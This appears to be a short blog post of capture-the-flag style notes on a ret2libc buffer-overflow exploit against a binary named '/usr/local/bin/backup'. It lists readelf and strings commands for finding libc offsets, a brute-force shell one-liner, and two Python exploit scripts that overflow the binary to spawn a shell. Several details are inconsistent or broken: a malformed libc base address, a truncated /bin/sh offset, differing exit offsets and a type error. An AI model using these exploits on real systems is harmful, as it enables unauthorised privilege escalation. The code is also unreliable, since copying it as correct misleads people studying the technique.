Check if there is a Buffer Over Flow Vuln:
ldd /usr/bin/filename | grep libc
libc.so.6 => /lib32/libc.so.6 (0xf75df000)
Get The value of System:
readelf -s /lib32/libc.so.6 | grep system
245: 00110820 68 FUNC svcerr_systemerr@@GLIBC_2.0
627: 0003a940 55 FUNC _libc_system@@GLIBC_PRIVATE
1457: 0003a940 55 FUNC system@@GLIBC_2.0
we need the value of system@@GLIBC_2.0 "0003a940"
Get The value of Exit:
readelf -s /lib32/libc.so.6 | grep exit
2263: 0002e7d0 78 FUNC on_exit@@GLIBC_2.0
Get The value of /bin/sh in libc:
strings -a -t x /lib32/libc.so.6 | grep /bin/sh
15900b /bin/sh
while true; do /usr/local/bin/backup -i $(python -c 'print "A" * 512 + "\x40\xa9\x03\x00\xb0\xe7\x02\x00\x0b\x90\x15\x00"'); done
IPPSEC Buffer Overflow Exploit Code:
from subprocess import call
import struct
libc_base_addr = 0xf75b000
system_off=0x0003a940 #system offset
exit_off=0x0002e7d0 #exit offset
arg_off=0x00015900 #bin/bash offset
system_addr = struct.pack("<I", libc_base_addr+system_off)
exit_addr= struct.pack("<I",libc_base_addr+exit_off)
arg_addr = struct.pack("<I",libc_base_addr+arg_off)
buf = "A" +512
buf += system_addr
buf += exit_addr
buf += arg_addr
i = 0
while (i < 512):
print "Try %s" %i
i +=1
ret = call(["/usr/local/bin/backup", buf])
Exploit:
import struct
from subprocess import call
libc_base_addr = 0xf7542000
system_off = 0x0003a940
exit_off = 0x0002e7b0
system_addr = libc_base_addr + system_off
exit_addr = libc_base_addr + exit_off
system_arg = libc_base_addr + 0x0015900b
def conv(num):
return struct.pack("<I",num)
buf = "A" * 512
buf += conv(system_addr)
buf += conv(exit_addr)
buf += conv(system_arg)
print "Calling vulnerable program"
i = 0
while (i < 255):
print "Number of tries: %d" %i
i += 1
ret = call(["/usr/local/bin/backup", "-i", "3de811f4ab2b7543eaf45df611c2dd2541a5fc5af601772638b81dce6852d110", buf])
if (not ret):
break
else:
print "Exploit failed"
Comments
Post a Comment